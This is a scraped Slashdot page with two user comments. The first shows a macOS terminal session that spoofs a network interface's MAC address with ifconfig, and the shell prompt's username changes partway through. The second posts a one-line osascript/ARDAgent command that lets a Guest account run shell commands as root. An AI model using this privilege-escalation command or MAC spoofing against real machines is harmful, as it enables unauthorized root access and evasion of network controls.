Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror

Comment Re:Already Fixed (Score 1) 118

Yep, working here on Catalina GM1 (zsh shell)

Peters-MacBook-Pro:~ peterglock$ sudo ifconfig en0
Password:
en0: flags=8863 mtu 1500
        options=400
        ether f0:18:98:24:31:b2
        inet 10.0.9.114 netmask 0xffffff00 broadcast 10.0.9.255
        media: autoselect
        status: active
Peters-MacBook-Pro:~ hack101$ sudo ifconfig en0 ether f0:18:98:24:31:b3
Peters-MacBook-Pro:~ hack101$ sudo ifconfig en0
en0: flags=8863 mtu 1500
        options=400
        ether f0:18:98:24:31:b3
        media: autoselect ()
        status: inactive
Peters-MacBook-Pro:~ hack101$ sudo ifconfig en0 up
Peters-MacBook-Pro:~ hack101$ sudo ifconfig en0
en0: flags=8863 mtu 1500
        options=400
        ether f0:18:98:24:31:b3
        inet 10.0.9.115 netmask 0xffffff00 broadcast 10.0.9.255
        media: autoselect
        status: active

Comment Guest Access (Score 1) 359

Confirmed that anyone logged in as Guest (supposed to be a low-privilege account) can use this exploit to get to root.
macbookpro:~ Guest$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Next time your at one of those shows where they have supposedly locked-down machines for webmail etc you know how much to trust them...

Slashdot Top Deals

% APL is a natural extension of assembler language programming; ...and is best for educational purposes. -- A. Perlis

Working...